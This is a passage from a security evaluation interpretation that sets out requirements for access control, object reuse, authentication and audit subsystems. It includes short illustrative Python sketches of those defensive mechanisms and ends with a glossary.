The following interpretation, in addition to the interpretations and requirements for the DAC/D2 class, shall be satisfied for the DAC/D3 class. 
2.1.3.3.1 Access control lists for each object
The DAC subsystem shall allow users to specify the list of individuals or groups of individuals who can access each object. The list shall additionally specify the mode(s) of access that is allowed each user or group. This implies that access control lists associated with each object are the only acceptable mechanism to satisfy the DAC/D3 requirement. 
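A per-object access control list of the DAC/D3 shape, named individuals and groups with modes, plus explicit exclusion lists, can be sketched as follows (hypothetical Python; the rule that an exclusion overrides any allow entry is an illustrative design choice, not quoted from the document):

```python
# Hypothetical sketch of a DAC/D3 ACL: for each named object, a list of
# allowed individuals/groups with their access modes, and a list of
# individuals/groups explicitly given no access. Names are illustrative.

groups = {"interns": {"dave"}}

acl = {
    "plan.doc": {
        "allow": [("alice", "user", {"read", "write"}),
                  ("interns", "group", {"read"})],
        "deny":  [("dave", "user")],   # assumed: exclusion overrides allows
    },
}

def in_entry(user, grantee, kind):
    return ((kind == "user" and grantee == user)
            or (kind == "group" and user in groups.get(grantee, set())))

def mediate(user, obj, mode):
    entry = acl.get(obj)
    if entry is None:
        return False
    if any(in_entry(user, g, k) for g, k in entry["deny"]):
        return False                    # explicitly excluded
    return any(in_entry(user, g, k) and mode in modes
               for g, k, modes in entry["allow"])

assert mediate("alice", "plan.doc", "write")
assert not mediate("dave", "plan.doc", "read")  # in a group allowed read,
                                                # but individually excluded
```

The exclusion list is what distinguishes D3: membership in an allowed group is not sufficient if the individual is named in the no-access list.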
2.1.4 Assurance Requirements for DAC Subsystems
DAC subsystems must comply with all of the assurance requirements for their given class as indicated below. The interpretations for these assurance requirements are contained in Section 3. 
Subsystems at the DAC/D1 class must comply with: 
· System Architecture (D1) 
· System Integrity (D1) 
· Security Testing (D1) 
Subsystems at the DAC/D2 and DAC/D3 classes must comply with: 
· System Architecture (D2) 
· System Integrity (D2) 
· Security Testing (D2) 
2.1.5 Documentation Requirements for DAC Subsystems
DAC subsystems must meet the documentation requirements listed below for their target rating class. The interpretations for these documentation requirements are contained in Section 4. 
Subsystems at the DAC/D1 class must comply with: 
· Security Features User's Guide (D1) 
· Trusted Facility Manual (D1) 
· Test Documentation (D1) 
· Design Documentation (D1) 
Subsystems at the DAC/D2 and DAC/D3 classes must comply with: 
· Security Features User's Guide (D2) 
· Trusted Facility Manual (D2) 
· Test Documentation (D2) 
· Design Documentation (D2) 
2.2 OBJECT REUSE SUBSYSTEMS
2.2.1 Global Description of Subsystem Features
2.2.1.1 Purpose
Object reuse subsystems clear storage objects to prevent subjects from scavenging data from storage objects which have been previously used. 
2.2.1.2 Role Within the Complete Security System
Object reuse can be used to prevent information scavenging by erasing information residue contained in previously used storage objects that have been released by the storage management system. Object reuse subsystems are most effective in environments where some security policy is implemented on the system. 
To prevent scavenging of information from previously used storage objects, object reuse subsystems must be fully integrable with the operating system of the protected system. The object reuse subsystem must perform its function for all reusable storage objects on the protected system (i.e., main memory, disk storage, tape storage, I/O buffers, etc.). 
Object reuse subsystems must be interfaced with the protected system in such a way that they are tamperproof and always invoked. 
2.2.2 Evaluation of Object Reuse Subsystems
Subsystems which implement object reuse must comply with all of the TCSEC requirements as outlined below for features, assurances, and documentation. Compliance with these requirements will show that the subsystem can enforce object reuse adequately to receive an OR/D2 rating for object reuse. 
As a part of the evaluation, the subsystem vendor shall set up the subsystem in a typical functional configuration for security testing. This will show that the subsystem interfaces correctly with the protected system to meet all of the feature requirements in this section and all of the assurance and documentation requirements in Sections 3 and 4. It will also show that the subsystem can be integrated into a larger system environment. 
The interpretations for applying the feature requirements of object reuse subsystems are explained in the subsequent interpretations section. The application of the assurance requirements listed below is explained in Sections 3 and 4, respectively. 
2.2.3 Feature Requirements for Object Reuse Subsystems
2.2.3.1 OR/D2
TCSEC Quote: 
"C2: New: all authorizations to the information contained within a storage object shall be revoked prior to initial assignment, allocation or reallocation to a subject from the TCB's pool of unused storage objects. No information, including encrypted representations of information, produced by a prior subject's actions is to be available to any subject that obtains access to an object that has been released back to the system." 
Interpretation: 
In the TCSEC quote, "TCB" is interpreted to mean "protected system". Otherwise, this requirement applies as stated. The object reuse subsystem shall perform its function for all storage objects on the protected system that are accessible to users. 
Rationale/Discussion: 
Object reuse subsystems must assure that no previously used storage objects (e.g., message buffers, page frames, disk sectors, magnetic tape, memory registers, etc.) can be used to scavenge residual information. Information remaining in previously used storage objects can be destroyed by overwriting it with meaningless or unintelligible bit patterns. An alternative way of approaching the problem is to deny read access to previously used storage objects until the user who has just acquired them has overwritten them with his own data. 
Object reuse subsystems do not equate to systems used to eliminate magnetic remanence. 
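The overwriting approach discussed above can be sketched in a few lines of code. The following Python fragment is purely illustrative; the FramePool class, its method names, and the fixed-size frame pool are hypothetical and not drawn from any evaluated subsystem.

```python
# Minimal sketch, assuming storage objects are fixed-size frames managed
# by a pool. All names here are illustrative assumptions.

class FramePool:
    """A pool of reusable storage frames that destroys residue on release."""

    def __init__(self, frame_count, frame_size):
        self.frame_size = frame_size
        self.free = [bytearray(frame_size) for _ in range(frame_count)]

    def release(self, frame):
        # Overwrite the information residue with a meaningless bit pattern
        # before the frame re-enters the pool of unused storage objects.
        for i in range(len(frame)):
            frame[i] = 0
        self.free.append(frame)

    def allocate(self):
        # Because release() scrubbed the frame, a new subject cannot
        # scavenge information produced by a prior subject's actions.
        return self.free.pop()

pool = FramePool(frame_count=2, frame_size=4)
frame = pool.allocate()
frame[0:4] = b"key!"          # a prior subject writes sensitive data
pool.release(frame)           # the residue is destroyed here
reused = pool.allocate()
assert bytes(reused) == b"\x00\x00\x00\x00"
```

The alternative approach, denying read access until the new subject has overwritten the frame with its own data, would move the enforcement from release() into allocate().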
2.2.4 Assurance Requirements for Object Reuse Subsystems
Object reuse subsystems must comply with all of the assurance requirements shown below for the D2 class. The interpretations for these assurance requirements for Object Reuse subsystems are contained in Section 3. 
· System Architecture (D2) 
· System Integrity (D2) 
· Security Testing (D2) 
2.2.5 Documentation Requirements for Object Reuse Subsystems 
Object reuse subsystems must meet the documentation requirements shown below for the D2 class. The interpretations for these documentation requirements are contained in Section 4. 
· Security Features User's Guide (D2) 
· Trusted Facility Manual (D2) 
· Test Documentation (D2) 
· Design Documentation (D2) 
2.3 IDENTIFICATION & AUTHENTICATION (I&A) SUBSYSTEMS 
2.3.1 Global Description of Subsystem Features
2.3.1.1 Purpose
This subsystem provides the authenticated identification of a user seeking to gain access to any resources under the control of the protected system. 
2.3.1.2 Role Within Complete Security System
The I&A subsystem provides an authenticated user identification needed to provide accountability for and control access to the protected system. The granularity of user identification is determined by the requirements in this interpretation. The granularity increases from group identification at I&A/D1 to individual identification at I&A/D2. 
The requirement is to be able to accurately authenticate the claimed identity of a user. The I&A subsystem must determine whether a user is authorized to use the protected system. For all authorized users, the I&A subsystem communicates the identity of the user to the protected system. This identity can then be used by the protected system or other subsystems to provide accountability for use of the system and access controls to protected objects on the system. To be effective and to protect the authentication data it uses, the I&A subsystem must be tamperproof and always invoked. 
At I&A/D2, it is important that all uses of the I&A subsystem be recorded in an audit trail. The auditing of these actions may be performed entirely by the auditing mechanism on the I&A subsystem, or through an interface with an auditing mechanism in the protected system or another subsystem. 
2.3.2 Evaluation of I&A Subsystems
Subsystems which are designed to implement I&A must comply with all of the TCSEC requirements outlined below for features, assurances, and documentation. Compliance with these requirements will assure that the subsystem can enforce, either wholly or in part, a specific I&A policy. As a part of the evaluation, the subsystem vendor shall set up the subsystem in a typical functional configuration for security testing. This will show that the subsystem interfaces correctly with the protected system to meet all of the feature requirements in this section and all of the assurance and documentation requirements in Sections 3 and 4. It will also show that the subsystem can be integrated into a larger system environment. 
The interpretations for applying the feature requirements to I&A subsystems are explained in the subsequent interpretations sections. The application of the assurance requirements and documentation requirements listed in the next section is explained in Sections 3 and 4, respectively. 
2.3.3 Feature Requirement for I&A Subsystems
2.3.3.1 I&A/D1
TCSEC Quote: 
"C1: New: The TCB shall require users to identify themselves to it before beginning to perform any other actions that the TCB is expected to mediate. Furthermore, the TCB shall use a protected mechanism (e.g., passwords) to authenticate the user's identity. The TCB shall protect authentication data so that it cannot be accessed by any unauthorized user." 
Interpretation: 
The I&A subsystem shall require users to identify themselves to it before beginning to perform any other actions that the system is expected to mediate. Furthermore, the I&A subsystem shall use a protected mechanism (e.g., passwords) to authenticate the user's identity. The I&A subsystem shall protect authentication data so that it cannot be accessed by any unauthorized user. 
The I&A subsystem shall, at a minimum, identify and authenticate system users. At I&A/D1, users need not be individually identified. 
Rationale/Discussion: 
Identification and Authentication must be based on at least a two-step process, which is derived from a combination of something the user possesses (e.g., smart card, magnetic stripe card), some physical attribute about the user (e.g., fingerprint, voiceprint), something the user knows (e.g., password, passphrase). The claimed identification of a user must be authenticated by an explicit action of the user. It is not acceptable for one step to be used as both identification and authentication. The claimed identity can be public. The measure used for authentication must be resistant to forging, guessing, and fabricating. 
The I&A subsystem must interface to the protected system in such a way that it can reliably pass authenticated user identities to the protected system. The evaluation shall show that authenticated user identities can be passed to the protected system. 
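The two-step process described above, a public claimed identity followed by an explicit authentication step checked against protected authentication data, can be sketched as follows. The salted-hash scheme and every name in this fragment are illustrative assumptions, not a mechanism required by this interpretation.

```python
# Hypothetical sketch of two-step I&A. The in-memory _auth_data store
# stands in for the protected authentication data; a real subsystem
# must protect this data from any unauthorized access.
import hashlib
import hmac
import os

_auth_data = {}   # protected authentication data: user -> (salt, digest)

def enroll(user, password):
    salt = os.urandom(16)
    digest = hashlib.sha256(salt + password.encode()).digest()
    _auth_data[user] = (salt, digest)

def authenticate(user, password):
    """Return the authenticated identity, or None on failure."""
    if user not in _auth_data:            # step 1: claimed identification
        return None
    salt, digest = _auth_data[user]       # step 2: explicit authentication
    candidate = hashlib.sha256(salt + password.encode()).digest()
    if hmac.compare_digest(candidate, digest):
        return user   # identity may now be passed to the protected system
    return None

enroll("operator1", "correct horse")
assert authenticate("operator1", "correct horse") == "operator1"
assert authenticate("operator1", "wrong guess") is None
```

Note that the claimed identity ("operator1") may be public; only the authentication measure must resist forging, guessing, and fabrication.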
2.3.3.2 I&A/D2
TCSEC Quote: 
"C2: Add: The TCB shall be able to enforce individual accountability by providing the capability to uniquely identify each individual ADP system user. The TCB shall also provide the capability of associating this identity with all auditable actions taken by that individual." 
Interpretation: 
The following interpretations, in addition to those interpretations for I&A/D1, shall be satisfied at the I&A/D2 class. 
In the TCSEC quote, "TCB" is interpreted to mean "I&A subsystem." The I&A subsystem shall pass to the protected system a unique identifier for each individual. 
The I&A subsystem shall be able to uniquely identify each individual user. This includes the ability to identify individual members within an authorized user group and the ability to identify specific system users such as operators, system administrators, etc. 
The I&A subsystem shall provide for the audit logging of security-relevant I&A events. For I&A, the origin of the request (e.g., terminal ID, etc.), the date and time of the event, user ID (to the extent recorded), type of event, and the success or failure of the event shall be recorded. The I&A subsystem may meet this requirement either through its own auditing mechanism or by providing an interface for passing the necessary data to another auditing mechanism. 
Rationale/Discussion: 
The intent of this requirement is for the I&A subsystem to supply a unique identity for each user to the protected system. The subsystem supplies a unique user identity which may or may not be used by an auditing mechanism. This auditing support is required to maintain consistency with the C2 level of trust as defined by the TCSEC. 
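The I&A audit record fields required above (origin of request, date and time, user ID, event type, success or failure) can be captured in a simple data structure. The layout and field names below are assumptions for illustration; this interpretation prescribes the content of the record, not its format.

```python
# Illustrative I&A audit record; all names are hypothetical.
from dataclasses import dataclass
from datetime import datetime, timezone

@dataclass(frozen=True)
class IAAuditRecord:
    origin: str        # origin of the request, e.g., terminal ID
    timestamp: str     # date and time of the event
    user_id: str       # user ID, to the extent recorded
    event_type: str    # type of event, e.g., "login"
    success: bool      # success or failure of the event

def record_ia_event(origin, user_id, event_type, success):
    """Package one security-relevant I&A event into an audit record."""
    return IAAuditRecord(
        origin=origin,
        timestamp=datetime.now(timezone.utc).isoformat(),
        user_id=user_id,
        event_type=event_type,
        success=success,
    )

rec = record_ia_event("TTY03", "operator1", "login", False)
assert rec.origin == "TTY03" and rec.success is False
```

A record like this could be stored by the I&A subsystem's own auditing mechanism or passed across an interface to an external auditing mechanism, as the interpretation permits.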
2.3.4 Assurance Requirements for I&A Subsystems
I&A subsystems must comply with all of the assurance requirements listed below for their given class. The interpretations for these assurance requirements to I&A subsystems are contained in Section 3. 
Subsystems at the I&A/D1 class shall comply with: 
· System Architecture (D1) 
· System Integrity (D1) 
· Security Testing (D1) 
Subsystems at the I&A/D2 class shall comply with: 
· System Architecture (D2) 
· System Integrity (D2) 
· Security Testing (D2) 
2.3.5 Documentation Requirements for I&A Subsystems
I&A subsystems must meet the documentation requirements listed below for their target rating class. The interpretations for these documentation requirements are contained in Section 4. 
Subsystems at the I&A/D1 class shall comply with: 
· Security Features User's Guide (D1) 
· Trusted Facility Manual (D1) 
· Test Documentation (D1) 
· Design Documentation (D1) 
Subsystems at the I&A/D2 class shall comply with: 
· Security Features User's Guide (D2) 
· Trusted Facility Manual (D2) 
· Test Documentation (D2) 
· Design Documentation (D2) 
2.4 AUDIT SUBSYSTEMS
2.4.1 Global Description of Subsystem Features
2.4.1.1 Purpose
Accountability is partly achieved through auditing. That is, data from security-relevant events is captured and passed to the audit mechanism to be recorded for use in detecting possible security breaches and providing a trace to the party responsible. 
2.4.1.2 Role Within Complete Security System
The requirement is to be able to record security-relevant events in a manner that will allow detection and/or after-the-fact investigations to trace security violations to the responsible party. 
An auditing subsystem must be capable of recording all security-relevant actions that take place throughout the computer system. To accomplish this goal, it must integrate itself into the mechanisms that mediate access and perform user identification and authentication, and capture data about the events they control. Additionally, an audit subsystem must be interfaced with the protected system in such a way that it is tamperproof and always invoked. 
The auditing subsystem must be provided all of the necessary data associated with actions as specified in Section 2.4.3. The necessary data includes the unique identity of the user that is responsible for each action. This implies that an auditing subsystem must be augmented by an identification and authentication mechanism either within the subsystem itself or elsewhere on the system. 
2.4.2 Evaluation of Auditing Subsystems
Subsystems which are designed to implement audit data collection and control functions for a host must comply with all of the TCSEC requirements as outlined below for features, assurances and documentation. Compliance with these features will assure that the subsystem, through its integration, can detect or generate the relevant audit data or can record all relevant audit data passed to it by the host or other subsystems. 
As a part of the evaluation, the subsystem vendor shall set up the subsystem in a typical functional configuration for security testing. This will show that the subsystem interfaces correctly with the protected system to meet all of the feature requirements in this section and all of the assurance and documentation requirements in Sections 3 and 4. It will also show that the subsystem can be integrated into a larger system environment. 
The interpretations for applying the feature requirements to auditing subsystems are explained in the subsequent interpretations sections. The application of the assurance requirements and documentation requirements is explained in Sections 3 and 4, respectively. 
2.4.3 Feature Requirements For Auditing Subsystems
2.4.3.1 AUD/D2
TCSEC Quote: 
"C2: New: The TCB shall be able to create, maintain, and protect from modification or unauthorized access or destruction an audit trail of accesses to the objects it protects. The audit data shall be protected by the TCB so that read access to it is limited to those who are authorized for audit data. The TCB shall be able to record the following types of events: use of identification and authentication mechanisms, introduction of objects into a user's address space (e.g., file open, program initiation), deletion of objects, actions taken by computer operators and system administrators and/or system security officers, and other security relevant events. For each recorded event, the audit record shall identify: date and time of the event, user, type of event, and success or failure of the event. For identification/authentication events the origin of request (e.g., terminal ID) shall be included in the audit record. For events that introduce an object into a user's address space and for object deletion events the audit record shall include the name of the object. The ADP system administrator shall be able to selectively audit the actions of any one or more users based on individual identity." 
Interpretations: 
The following subsections provide interpretations of the TCSEC requirements which shall be satisfied by auditing subsystems at AUD/D2. 
2.4.3.1.1 Creation and management of audit trail
The auditing subsystem shall create and manage the audit trail of security-relevant events in the system. If the other portions of the system are unable to capture data about such events, the auditing subsystem shall contain the necessary interfaces into the system to perform this function. Alternatively, the auditing subsystem might simply accept and store data about events if the other portions of the system are capable of creating such data and passing them on. 
Rationale/Discussion: 
To meet this requirement, it is sufficient that the audit subsystem provides a set of calls which permit the system to supply the needed data as parameters that the audit subsystem puts into a data structure and routes to audit storage (or transmits securely to an audit logger). 
2.4.3.1.2 Protection of audit data
It shall be demonstrated that the audit data is protected from unauthorized modification. This protection will be provided either by the subsystem itself or by its integration with the protected system. 
Rationale/Discussion: 
The auditing subsystem might store the audit data in a dedicated data storage area that cannot be accessed by any subject on the system except the auditing subsystem itself and the system security officer (or system administrator) through the auditing subsystem. Or, if the protected system has adequate access control facilities, the audit data might be stored on the protected system, using its access control mechanisms for protection. 
2.4.3.1.3 Access control to audit
The audit mechanism, auditing parameters, and the audit data storage media shall be protected to ensure access is allowed only to authorized individuals. Individuals who are authorized to access the audit data shall be able to gain access only through the auditing subsystem. 
Rationale/Discussion: 
This interpretation assumes that discretionary access controls or physical controls will be in place to keep unauthorized individuals from gaining access to the audit data. 
2.4.3.1.4 Specific types of events
Data about all security relevant events must be recorded. The other portions of the system shall be able to pass data concerning these events to the auditing subsystem, or the auditing subsystem shall have the necessary code integrated into the other portions of the system to pass the data to the collection point. 
2.4.3.1.5 Specific information per event
All of the specific information enumerated in the TCSEC quote shall be captured for each recorded event. Of particular concern is the recording of the user identity with each recorded event. 
Rationale/Discussion: 
This implies that the audit subsystem must be able to acquire user identities from an I&A mechanism, which may be provided on the audit subsystem itself, on the protected system, or in a separate I&A subsystem. Whichever is the case, the evaluation shall show that the audit subsystem has a working interface to an I&A mechanism. 
2.4.3.1.6 Ability to selectively audit individuals
The auditing subsystem shall have the ability to perform selection of audit data based on individual users. 
Rationale/Discussion: 
This requirement can be satisfied by pre-selection of the information to be recorded in the audit log (selective logging) and/or by post-selection of information to be extracted from the audit log (selective reduction). The reduction of the audit log must be able to show all of the security-relevant actions performed by any specified individual. The intent of selective logging is to reduce the volume of audit data to be recorded by only recording audit data for those specific individuals that the system security officer (or system administrator) specifies. The intent of selective reduction is to reduce the large volume of audit data into a collection of intelligible information which can be more efficiently used by the system administrator. 
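Both selection techniques are simple filters over audit records. The sketch below assumes audit records are plain dicts with a "user" field; the record layout and all names are illustrative assumptions, not a prescribed format.

```python
# Hypothetical audit log; each record carries the responsible user identity.
audit_log = [
    {"user": "alice", "event": "login",       "success": True},
    {"user": "bob",   "event": "file_open",   "success": False},
    {"user": "alice", "event": "file_delete", "success": True},
]

selected_users = {"alice"}   # set by the system security officer

def pre_select(record):
    """Selective logging: record only events for the selected individuals."""
    return record["user"] in selected_users

def reduce_by_user(log, user):
    """Selective reduction: extract one individual's actions from the log."""
    return [r for r in log if r["user"] == user]

# Reduction must show ALL security-relevant actions of a specified individual.
assert len(reduce_by_user(audit_log, "alice")) == 2
assert [pre_select(r) for r in audit_log] == [True, False, True]
```

Pre-selection trades audit completeness for volume; post-selection keeps the complete log and pays the cost at reduction time.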
2.4.3.2 AUD/D3
TCSEC Quote: 
"B3: Add: The TCB shall contain a mechanism that is able to monitor the occurrence or accumulation of security auditable events that may indicate an imminent violation of security policy. This mechanism shall be able to immediately notify the security administrator when thresholds are exceeded and, if the occurrence or accumulation of these security relevant events continues, the system shall take the least disruptive action to terminate the event." 
Interpretation: 
The following interpretation, in addition to the interpretation and requirement for AUD/D2, shall be satisfied for the AUD/D3 class. 
2.4.3.2.1 Real-time alarms
The auditing subsystem shall provide the capability for the security administrator to set thresholds for certain auditable events. Furthermore, when the thresholds are exceeded, the audit subsystem shall immediately notify the security administrator of an imminent security violation. 
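The threshold-and-notify behavior required above can be sketched as a counter per event type with an administrator-supplied callback. The class, the event names, and the threshold values below are illustrative assumptions only.

```python
# Hypothetical real-time alarm sketch; names are illustrative.
from collections import Counter

class AuditAlarm:
    def __init__(self, thresholds, notify):
        self.thresholds = thresholds   # event type -> threshold set by admin
        self.counts = Counter()        # accumulation of auditable events
        self.notify = notify           # immediate notification channel

    def record(self, event_type):
        self.counts[event_type] += 1
        limit = self.thresholds.get(event_type)
        if limit is not None and self.counts[event_type] > limit:
            # threshold exceeded: notify the security administrator at once
            self.notify(event_type, self.counts[event_type])

alerts = []
alarm = AuditAlarm({"failed_login": 3}, lambda ev, n: alerts.append((ev, n)))
for _ in range(5):
    alarm.record("failed_login")
# The first three failures stay below the threshold; the fourth and fifth alarm.
assert alerts == [("failed_login", 4), ("failed_login", 5)]
```

The AUD/D3 requirement goes further than this sketch: if the accumulation continues, the system must also take the least disruptive action that terminates the event.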
2.4.4 Assurance Requirements for Auditing Subsystems
Audit subsystems, whether being evaluated at AUD/D2 or AUD/D3, must comply with the assurance requirements listed below for the D2 class. The interpretations for these assurance requirements are contained in Section 3. 
· System Architecture (D2) 
· System Integrity (D2) 
· Security Testing (D2) 
2.4.5 Documentation Requirements for Auditing Subsystems
Audit subsystems, whether being evaluated at AUD/D2 or AUD/D3, must meet the documentation requirements listed below for the D2 class. The interpretations for these documentation requirements are contained in Section 4. 
· Security Features User's Guide (D2) 
· Trusted Facility Manual (D2) 
· Test Documentation (D2) 
· Design Documentation (D2) 
3. ASSURANCE REQUIREMENTS
Rated subsystems must provide correct and accurate operations. Assurance must be provided that correct implementation and operation of the subsystem's function exist throughout the subsystem's life cycle. The objective in applying these assurance requirements is to develop confidence that the subsystem has been implemented correctly and that it is protected from tampering and circumvention. 
The requirement is that the subsystem must contain hardware/software mechanisms that can be independently evaluated through a combination of inspection and testing to provide sufficient assurance that the subsystem features enforce or support the functions for which the subsystem is intended. To receive a rating, a subsystem must meet the assurance requirements at the same level of trust as it has met the requirements for functionality. The assurances must be applied to the different types of subsystems as described in the previous sections. 
3.1 SUBSYSTEM ARCHITECTURE
Subsystem architecture evaluation is designed to provide operational assurances with regard to the design and implementation of the protection mechanisms of the subsystem and its interfaces to the host/host TCB. 
3.1.1 Arch:D1
TCSEC Quote: 
"C1: New: The TCB shall maintain a domain for its own execution that protects it from external interference or tampering (e.g., by modification of its code or data structures). Resources controlled by the TCB may be a defined subset of the subjects and objects in the ADP system." 
Interpretation: 
This requirement applies to all subsystems evaluated at all classes, regardless of the function(s) they perform. There are two specific elements of this requirement: Execution Domain Protection and Defined Subsets. 
3.1.1.1 Execution Domain Protection
Protection of the subsystem's mechanism and data from external interference or tampering must be provided. The code and data of the subsystem may be protected through physical protection (e.g., by the subsystem's dedicated hardware base) or by logical isolation (e.g., using the protected system's domain mechanism). 
Rationale/Discussion: 
The subsystem may be contained entirely on its own hardware base which must protect the operational elements of the mechanisms. Alternatively, all or a portion of the subsystem may be implemented on the hardware of the host, in which case the host system's architecture must protect this portion from external interference or tampering. 
3.1.1.2 Defined Subsets
I&A subsystems, when used for the system's I&A, define the subset of subjects under the control of the system's TCB. DAC subsystems may protect a subset of the total collection of objects on the protected system. 
3.1.2 Arch:D2
TCSEC Quotes: 
"C2: Add: The TCB shall isolate the resources to be protected so that they are subject to the access control and auditing requirements." 
Interpretation: 
In the TCSEC quote, "TCB" is interpreted to mean "subsystem". 
This requirement applies to all subsystems evaluated at the D2 class or the D3 class. The following interpretations explain how this requirement applies to specific functions performed by subsystems. 
· Interpretation for DAC Subsystems: 
All named objects which are in the defined subset of protected objects shall be isolated such that the DAC subsystem mediates all access to those objects. 
· Interpretation for Auditing Subsystems: 
The system's architecture shall ensure that the auditing mechanism cannot be bypassed by any subjects accessing those objects under the system's control. 
· Interpretation for Object Reuse Subsystems 
The notion of subsetting objects is not applicable to object reuse subsystems. Object reuse subsystems shall perform their function for all storage objects on the protected system that are accessible to users. 
· Interpretation for I&A Subsystems: 
This requirement applies to I&A subsystems. Authentication data shall be protected from unauthorized access. Access to the authentication data shall also be recorded in the audit trail. 
3.2 SUBSYSTEM INTEGRITY
Subsystem integrity evaluation is designed to provide operational assurances with regard to the correct operation of the protection mechanisms of the subsystem and its interfaces to the protected system. 
3.2.1 Integrity:D1
TCSEC Quote: 
"C1: New: Hardware and/or software features shall be provided that can be used to periodically validate the correct operation of the on-site hardware and firmware elements of the TCB." 
Interpretation: 
In the TCSEC quote, "TCB" is interpreted to mean "subsystem". 
This requirement applies to all subsystems evaluated at any class, regardless of the functions they perform. 
Rationale/Discussion: 
The capability must exist to validate the correct operation of all hardware and firmware elements of the system regardless of whether they reside within the subsystem, the protected system, or other interfacing subsystems. If the hardware and/or firmware elements of the protected system or other interfacing subsystems play an integral role in the protection and/or correct operation of the subsystem, then they must comply with this requirement as though they were part of the subsystem. 
3.2.2 Integrity:D2
There are no additional requirements for System Integrity at D2. 
3.3 SECURITY TESTING
Testing, as part of the evaluation, is designed to provide life cycle assurances with regard to the integrity of the subsystem. Further, testing provides additional assurances regarding the correct operation of the protection mechanisms of the subsystem and the subsystem's interfaces to the protected system. These mechanisms, and their interfaces to the protected system, are termed the Subsystem's Security-Relevant Portion (SRP). 
3.3.1 Test:D1
TCSEC Quote: 
"C1: New: The security mechanisms of the ADP system shall be tested and found to work as claimed in the system documentation. Testing shall be done to assure that there are no obvious ways for an unauthorized user to bypass or otherwise defeat the security protection mechanisms of the TCB. (See the Security Testing Guidelines.)" 
Interpretation: 
This requirement applies to all subsystems evaluated at any class, regardless of the function(s) they perform. In the TCSEC quote, "TCB" is interpreted to mean subsystem. 
The subsystem's SRP shall be tested and found to work as claimed in the subsystem's documentation. The addition of a subsystem to a protected system shall not cause obvious flaws to the resulting system. 
Test results shall show that there are no obvious ways for an unauthorized user to bypass or otherwise defeat the subsystem's SRP. 
Rationale/Discussion: 
Security testing is a very important part of subsystem evaluations. It is essential that the subsystem be demonstrated to operate securely. 
3.3.2 Test:D2
TCSEC Quote: 
"C2: Add: Testing shall also include a search for obvious flaws that would allow violation of resource isolation, or that would permit unauthorized access to the audit or authentication data." 
Interpretation: 
This requirement applies to the testing of the SRP of any subsystem evaluated at the D2 class or the D3 class. 
Rationale/Discussion: 
The requirement as written in the TCSEC quote is directly applicable. This requirement is to ensure that subsystems at D2 cannot be circumvented or tampered with. 
4. DOCUMENTATION REQUIREMENTS
Documentation shall produce evidence that the subsystem can and does provide specified security features. The evaluation will focus on the completeness of this evidence through inspection of documentation structure and content and through a mapping of the documentation to the subsystem's implementation and its operation. 
4.1 SECURITY FEATURES USER'S GUIDE
4.1.1 SFUG:D1
TCSEC Quote: 
"C1: New: A single summary, chapter, or manual in user documentation shall describe the protection mechanisms provided by the TCB, guidelines on their use, and how they interact with one another." 
Interpretation: 
All subsystems shall meet this requirement in that they shall describe the protection mechanisms provided by the subsystem. 
Rationale/Discussion: 
It is recognized that some subsystems may be partially or completely transparent to the general user. In such cases, this requirement can be met by documenting the functions the subsystem performs so users will be aware of what the subsystem does. Other subsystems which have a very limited user interface may not need to be accompanied by more than a pocket-size card available to every user. In short, the documentation required to meet this requirement need not be elaborate, but must be clear and comprehensive. 
4.1.2 SFUG:D2
Interpretation: 
There are no additional requirements at the D2 class. 
4.2 TRUSTED FACILITY MANUAL
4.2.1 TFM:D1
TCSEC Quote: 
"C1: New: A manual addressed to the ADP system administrator shall present cautions about functions and privileges that should be controlled when running a secure facility." 
Interpretation: 
This requirement applies to all subsystems in that the manual shall present cautions about functions and privileges provided by the subsystem. Further, this manual shall present specific and precise direction for effectively integrating the subsystem into the overall system. 
4.2.2 TFM:D2
TCSEC Quote: 
"C2: Add: The procedures for examining and maintaining the audit files as well as the detailed audit record structure for each type of audit event shall be given." 
Interpretation: 
This requirement applies directly to all auditing subsystems and to other subsystems that maintain their own audit data concerning events that happen under their control. For subsystems that create audit data and pass it to an external auditing collection and maintenance facility, the audit record structure shall be documented; however, the procedures for examination and maintenance of audit files may be left to the external auditing facility. 
4.3 TEST DOCUMENTATION
4.3.1 TD:D1
TCSEC Quote: 
"C1: New: The system developer shall provide to the evaluators a document that describes the test plan, test procedures that show how the security mechanisms were tested, and results of the security mechanisms' functional testing." 
Interpretation: 
The document shall explain the exact configuration used for security testing. All mechanisms supplying the required supporting functions shall be identified. All interfaces between the subsystem being tested, the protected system, and other subsystems shall be described. 
4.3.2 TD:D2
Interpretation 
There are no additional requirements at the D2 class. 
4.4 DESIGN DOCUMENTATION
4.4.1 DD:D1
TCSEC Quote: 
"C1: New: Documentation shall be available that provides a description of the manufacturer's philosophy of protection and an explanation of how this philosophy is translated into the TCB. If the TCB is composed of distinct modules, the interfaces between these modules shall be described." 
Interpretation: 
This requirement applies directly to all subsystems. Specifically, the design documentation shall state what types of threats the subsystem is designed to protect against (e.g., casual browsing, determined attacks, accidents). This documentation shall show how the protection philosophy is translated into the subsystem's SRP. Design documentation shall also specify how the subsystem is to interact with the protected system and other subsystems to provide a complete computer security system. If the SRP is modularized, the interfaces between these modules shall be described. 
4.4.2 DD:D2
There are no additional requirements for Design Documentation at the D2 class. 
5. GLOSSARY
Accreditation - The official authorization that is granted to an ADP system to process sensitive information in its operational environment, based upon a comprehensive security evaluation of the system's hardware, firmware, and software security design, configuration, and implementation, and of the other system procedural, administrative, physical, TEMPEST, personnel, and communications controls. 
Audit - The procedure of capturing, storing, maintaining, and managing data concerning security-relevant events that occur on a computer system. The data recorded are intended for use in detecting security violations and tracing those violations to the responsible individual. 
Audit trail - A set of records that collectively provide documentary evidence of processing, used to aid in tracing from original transactions forward to related records and reports, and/or backwards from records and reports to their component source transactions. 
Authenticate - To establish the validity of a claimed identity. 
Authorization - Permission which establishes right to access information. 
Certification evaluation - The technical evaluation of a system's security features, made as part of and in support of the approval/accreditation process, that establishes the extent to which a particular computer system's design and implementation meet a set of specified security requirements. 
Computer security subsystem - Hardware, firmware and/or software which are added to a computer system to enhance the security of the overall system. 
Group user - A user of a computer system whose system identification is the name of a defined group of users on that system. 
Individual user - A user of a computer system whose system identification is unique, in that no other user on that system has that same identification. 
Named object - An object which is directly manipulable at the TCB interface. The object must have meaning to more than one process. 
Product evaluation - The technical evaluation of a product's security features to determine the level of trust that can be placed in that product as defined by the NCSC evaluation criteria for that type of product (e.g., operating system, database management system, computer network, computer security subsystem). Product evaluations do not consider the application of the product in the evaluation. 
Protected system - The system being protected. In the context of computer security subsystems, a stand-alone computer system or a computer network to which a subsystem is attached to provide some computer security function. 
